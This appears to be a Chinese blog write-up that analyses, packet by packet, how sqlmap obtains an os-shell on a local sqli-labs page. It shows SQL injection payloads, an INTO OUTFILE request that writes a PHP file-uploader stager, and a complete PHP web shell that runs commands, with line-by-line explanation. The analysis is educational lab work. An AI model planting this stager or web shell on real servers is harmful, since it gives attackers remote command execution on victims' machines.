• 对利用sqlmap获取os-shell过程的一次抓包分析


    本地执行完整过程

    D:sqlmap>python2 sqlmap.py -u http://127.0.0.1/SQL/Less-1/?id=1 --os-shell
            ___
           __H__
     ___ ___[)]_____ ___ ___  {1.2.11#stable}
    |_ -| . [(]     | .'| . |
    |___|_  [(]_|_|_|__,|  _|
          |_|V          |_|   http://sqlmap.org
    
    [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
    
    [*] starting at 23:10:10
    
    [23:10:10] [INFO] resuming back-end DBMS 'mysql'
    [23:10:10] [INFO] testing connection to the target URL
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 3621=3621 AND 'GLUP'='GLUP
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' AND (SELECT 3041 FROM(SELECT COUNT(*),CONCAT(0x7178787a71,(SELECT (ELT(3041=3041,1))),0x7171787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ErWL'='ErWL
    
        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'spJe'='spJe
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 3 columns
        Payload: id=-3185' UNION ALL SELECT NULL,CONCAT(0x7178787a71,0x4362634876576a754d757a6b534357506b55784569476b68786c616f6179476a796c464c6479666e,0x7171787a71),NULL-- KQNY
    ---
    [23:10:10] [INFO] the back-end DBMS is MySQL
    web server operating system: Windows
    web application technology: Apache 2.4.37, PHP 5.6.37
    back-end DBMS: MySQL >= 5.0
    [23:10:10] [INFO] going to use a web backdoor for command prompt
    [23:10:10] [INFO] fingerprinting the back-end DBMS operating system
    [23:10:10] [INFO] the back-end DBMS operating system is Windows
    which web application language does the web server support?
    [1] ASP (default)
    [2] ASPX
    [3] JSP
    [4] PHP
    > 4
    do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
    [23:10:27] [WARNING] unable to automatically retrieve the web server document root
    what do you want to use for writable directory?
    [1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
    [2] custom location(s)
    [3] custom directory list file
    [4] brute force search
    > 2
    please provide a comma separate list of absolute directory paths: E:wwwapacheApache24htdocs
    [23:10:50] [WARNING] unable to automatically parse any web server path
    [23:10:50] [INFO] trying to upload the file stager on 'E:/www/apache/Apache24/htdocs/' via LIMIT 'LINES TERMINATED BY' method
    [23:10:50] [INFO] the file stager has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpumgnt.php
    [23:10:50] [INFO] the backdoor has been successfully uploaded on 'E:/www/apache/Apache24/htdocs/' - http://127.0.0.1:80/tmpbwejn.php
    [23:10:50] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell> whoami
    do you want to retrieve the command standard output? [Y/n/a]
    command standard output:    'desktop-ei9lgn7xscope'
    os-shell>
    

    执行以上过程在本地一共抓到22个http数据包,其中11个请求包,11个响应包,下边依次对它们进行简要分析

    0x01

    请求
    GET /SQL/Less-1/?id=1 HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    

    此次sqlmap只进行了一次简单的 get 请求,应该是判断目标是否可达

    值得注意的是这里的 User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)

    然后本地服务器返回了一个响应数据包,返回正常页面内容

    响应
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:10 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 721
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Less-1 **Error Based- String**</title>
    </head>
    <body bgcolor="#000000">
    <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
    <font size="3" color="#FFFF00"> 
    <font size='5' color= '#99FF00'>Your Login name:Dumb<br>Your Password:Dumb</font></font> </div></br></br></br><center>
    <img src="../images/Less-1.jpg" /></center>
    </body>
    </html>
    

    0x02

    请求
    GET /SQL/Less-1/?id%5B%5D=1 HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    

    此次请求是在以下事件发生后进行的:
    do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y
    [23:10:27] [WARNING] unable to automatically retrieve the web server document root

    此次sqlmap在参数id后加了个%5D%5B,转码后就是 [],也就是把参数以数组的形式传递给了服务端,难道是想让网站报错爆出网站路径?没看源码不是很清楚...

    这次返回的响应数据与第一次返回的不同

    响应
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:27 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 670
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Less-1 **Error Based- String**</title>
    </head>
    <body bgcolor="#000000">
    <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
    <font size="3" color="#FFFF00">
    <font color= "#FFFF00"></font></font> </div></br></br></br><center>
    <img src="../images/Less-1.jpg" /></center>
    </body>
    </html>
    

    0x03

    请求
    GET /SQL/Less-1/?id=-1086%27%20OR%203105%3D3105%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27E%3A%2Fwww%2Fapache%2FApache24%2Fhtdocs%2Ftmpumgnt.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d29297b246469723d245f524551554553545b2275706c6f6164446972225d3b6966202870687076657273696f6e28293c27342e312e3027297b2466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d656c73657b2466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c246469722e222f222e2466696c6529206f722064696528293b7d4063686d6f6428246469722e222f222e2466696c652c30373535293b6563686f202246696c652075706c6f61646564223b7d656c7365207b6563686f20223c666f726d20616374696f6e3d222e245f5345525645525b225048505f53454c46225d2e22206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d453a5c5c7777775c5c6170616368655c5c41706163686532345c5c6874646f63735c5c3e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b7d3f3e0a--%20- HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    

    会发现第三次请求的参数很长,转换后如下

    id=-1086' OR 3105=3105 LIMIT 0,1 INTO OUTFILE 'E:/www/apache/Apache24/htdocs/tmpumgnt.php' LINES TERMINATED BY <?php
    if (isset($_REQUEST["upload"])){$dir=$_REQUEST["uploadDir"];if (phpversion()<'4.1.0'){$file=$HTTP_POST_FILES["file"]["name"];@move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();}else{$file=$_FILES["file"]["name"];@move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();}@chmod($dir."/".$file,0755);echo "File uploaded";}else {echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>";}?>
    

    利用mysql的 SELECT ... INTO OUTFILE ... LINES TERMINATED BY上传脚本

    代码展开后如下:

    <?php
    if (isset($_REQUEST["upload"])){
        $dir=$_REQUEST["uploadDir"];
        if (phpversion()<'4.1.0'){
            $file=$HTTP_POST_FILES["file"]["name"];
            @move_uploaded_file($HTTP_POST_FILES["file"]["tmp_name"],$dir."/".$file) or die();
        }
        else{
            $file=$_FILES["file"]["name"];
            @move_uploaded_file($_FILES["file"]["tmp_name"],$dir."/".$file) or die();
        }@chmod($dir."/".$file,0755);
        echo "File uploaded";
    }
    else {
    echo "<form action=".$_SERVER["PHP_SELF"]." method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:\www\apache\Apache24\htdocs\> <input type=submit name=upload value=upload></form>";
    }?>
    

    提供文件上传功能

    这次返回的响应数据和第二次返回的数据完全一样

    响应
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 670
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>Less-1 **Error Based- String**</title>
    </head>
    <body bgcolor="#000000">
    <div style=" margin-top:70px;color:#FFF; font-size:23px; text-align:center">Welcome&nbsp;&nbsp;&nbsp;<font color="#FF0000"> Dhakkan </font><br>
    <font size="3" color="#FFFF00"> 
    <font color= "#FFFF00"></font></font> </div></br></br></br><center>
    <img src="../images/Less-1.jpg" /></center>
    </body>
    </html>
    

    第四到八次请求全是用来判断文件上传到了哪里,这里请求的次数应该是跟0x02中提供的E:/www/apache/Apache24/htdocs/tmpumgnt.php路径深度有关

    0x04

    请求
    GET /www/apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    响应
    HTTP/1.1 404 Not Found
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    Content-Length: 237
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /www/apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
    </body></html>
    

    0x05

    请求
    GET /apache/Apache24/htdocs/tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    响应
    HTTP/1.1 404 Not Found
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    Content-Length: 233
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /apache/Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
    </body></html>
    

    0x06

    请求
    GET /Apache24/htdocs/tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    响应
    HTTP/1.1 404 Not Found
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    Content-Length: 226
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /Apache24/htdocs/tmpumgnt.php was not found on this server.</p>
    </body></html>
    

    0x07

    请求
    GET /htdocs/tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    响应
    HTTP/1.1 404 Not Found
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    Content-Length: 217
    Connection: close
    Content-Type: text/html; charset=iso-8859-1
    
    <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
    <html><head>
    <title>404 Not Found</title>
    </head><body>
    <h1>Not Found</h1>
    <p>The requested URL /htdocs/tmpumgnt.php was not found on this server.</p>
    </body></html>
    

    0x08

    请求
    GET /tmpumgnt.php HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    
    响应
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 330
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    1	Dumb	Dumb<form action=/tmpumgnt.php method=POST enctype=multipart/form-data><input type=hidden name=MAX_FILE_SIZE value=1000000000><b>sqlmap file uploader</b><br><input name=file type=file><br>to directory: <input type=text name=uploadDir value=E:wwwapacheApache24htdocs> <input type=submit name=upload value=upload></form>
    

    0x09

    请求
    POST /tmpumgnt.php?id=1 HTTP/1.1
    Content-Length: 1334
    Accept-Encoding: gzip,deflate
    Connection: close
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Host: 127.0.0.1
    Cache-Control: no-cache
    Content-Type: multipart/form-data; boundary=169.254.227.55.1.10780.1558019450.459.1
    
    --169.254.227.55.1.10780.1558019450.459.1
    Content-Disposition: form-data; name="uploadDir"
    
    E:wwwapacheApache24htdocs
    --169.254.227.55.1.10780.1558019450.459.1
    Content-Disposition: form-data; name="upload"
    
    1
    --169.254.227.55.1.10780.1558019450.459.1
    Content-Disposition: form-data; name="file"; filename="tmpbwejn.php"
    Content-Type: application/octet-stream
    
    <?php $c=$_REQUEST["cmd"];@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);$z=@ini_get('disable_functions');if(!empty($z)){$z=preg_replace('/[, ]+/',',',$z);$z=explode(',',$z);$z=array_map('trim',$z);}else{$z=array();}$c=$c." 2>&1
    ";function f($n){global $z;return is_callable($n)and!in_array($n,$z);}if(f('system')){ob_start();system($c);$w=ob_get_contents();ob_end_clean();}elseif(f('proc_open')){$y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);$w=NULL;while(!feof($t[1])){$w.=fread($t[1],512);}@proc_close($y);}elseif(f('shell_exec')){$w=shell_exec($c);}elseif(f('passthru')){ob_start();passthru($c);$w=ob_get_contents();ob_end_clean();}elseif(f('popen')){$x=popen($c,r);$w=NULL;if(is_resource($x)){while(!feof($x)){$w.=fread($x,512);}}@pclose($x);}elseif(f('exec')){$w=array();exec($c,$w);$w=join(chr(10),$w).chr(10);}else{$w=0;}print "<pre>".$w."</pre>";?>
    --169.254.227.55.1.10780.1558019450.459.1--
    

    代码展开后:

    <?php 
    $c=$_REQUEST["cmd"];
    @set_time_limit(0);
    @ignore_user_abort(1);
    @ini_set('max_execution_time',0);
    $z=@ini_get('disable_functions');
    if(!empty($z)){
        $z=preg_replace('/[, ]+/',',',$z);
        $z=explode(',',$z);
        $z=array_map('trim',$z);
    }
    else{
        $z=array();
    }
    $c=$c." 2>&1
    ";
    function f($n){
        global $z;
        return is_callable($n)and!in_array($n,$z);
    }
    if(f('system')){
        ob_start();
        system($c);
        $w=ob_get_contents();
        ob_end_clean();
    }
    elseif(f('proc_open')){
        $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
        $w=NULL;
        while(!feof($t[1])){
            $w.=fread($t[1],512);
        }
        @proc_close($y);
    }
    elseif(f('shell_exec')){
        $w=shell_exec($c);
    }
    elseif(f('passthru')){
        ob_start();
        passthru($c);
        $w=ob_get_contents();
        ob_end_clean();
    }
    elseif(f('popen')){
        $x=popen($c,r);
        $w=NULL;
        if(is_resource($x)){
            while(!feof($x)){
                $w.=fread($x,512);
            }
        }
        @pclose($x);
    }
    elseif(f('exec')){
        $w=array();
        exec($c,$w);
        $w=join(chr(10),$w).chr(10);
    }
    else{
        $w=0;
    }
    print "<pre>".$w."</pre>";?>
    

    该脚本先从客户请求中获取cmd的值赋值给 $c

    设置脚本最大执行时间为无限

    设置客户端断开连接时也不中断脚本执行

    获取配置文件中禁用的函数列表赋值给 $z

    如果禁用的函数列表 $z 不为空

    • 把列表中的所有英文逗号或者空格全部替换为英文逗号赋值给 $z
    • 然后按英文逗号分隔把该函数列表转换为数组赋值给 $z
    • 去除数组中每个元素首尾的空白字符赋值给 $z

    如果禁用的函数列表为空,就把 $z 初始化为空数组

    然后 $c=$c." 2>&1 "

    定义函数 f($n)

    • 调用全局变量$z
    • 如果 $n 可以被调用并且不在数组 $z 中返回true,否则返回false

    如果 f('system') 为 true

    • 打开输出缓冲
    • 执行cmd命令 $c
    • 获取缓冲区中的内容赋值给 $w
    • 清除缓冲区并关闭输出缓冲

    否则如果 f('proc_open') 为 true

    • 好像是创建一个子进程,执行命令,然后把执行结果写入到管道中
    • 从管道中读取命令的执行结果赋值给 $w
    • 关闭进程资源

    否则如果 f('shell_exec') 为 true

    • 通过 shell 环境执行命令,将结果返回给 $w

    否则如果 f('passthru') 为 true

    • 打开输出缓冲
    • 执行命令
    • 将缓冲区的内容赋值给 $w
    • 清楚缓冲区并关闭输出缓冲

    否则如果 f('popen') 为 true

    • 打开一个指向进程的管道,执行命令,返回一个fopen()相同的文件指针 $x
    • 读取该指针所指向的资源赋值给 $w
    • 关闭该资源 $x

    否则如果 f('exec') 为 true

    • $w 初始化为空数组
    • 执行命令并将结果填充到 $w 数组中
    • 将数组 $w 转换为用 chr(10) 连接的字符串

    否则

    • $w = 0

    最后 print "<pre>".$w."</pre>"

    响应
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 24
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    1	Dumb	DumbFile uploaded
    

    0x0a

    请求
    GET /tmpbwejn.php?cmd=echo%20command%20execution%20test HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    响应
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:10:50 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 36
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <pre>command execution test 
    </pre>
    

    0x0b

    请求
    GET /tmpbwejn.php?cmd=whoami HTTP/1.1
    Accept-Encoding: gzip,deflate
    Host: 127.0.0.1
    Accept: */*
    User-Agent: sqlmap/1.2.11#stable (http://sqlmap.org)
    Connection: close
    Cache-Control: no-cache
    
    响应
    HTTP/1.1 200 OK
    Date: Thu, 16 May 2019 15:11:08 GMT
    Server: Apache/2.4.37 (Win32) OpenSSL/1.0.2q PHP/5.6.37
    X-Powered-By: PHP/5.6.37
    Content-Length: 36
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    <pre>desktop-ei9lgn7xscope
    </pre>
    
  • 相关阅读:
    C# webservice服务跟踪调试方法(转)
    ServiceBase.OnStart 方法
    基本类型和引用类型
    js基本概念
    在HTML中使用JavaScript
    js中的this
    SQL 取两日期的记录
    常用数据结构[转]
    How to: Pass Values Between ASP.NET Web Pages
    example for store procedure with both transcration and error handling
  • 原文地址:https://www.cnblogs.com/BxScope/p/10883422.html
Copyright © 2020-2023  润新知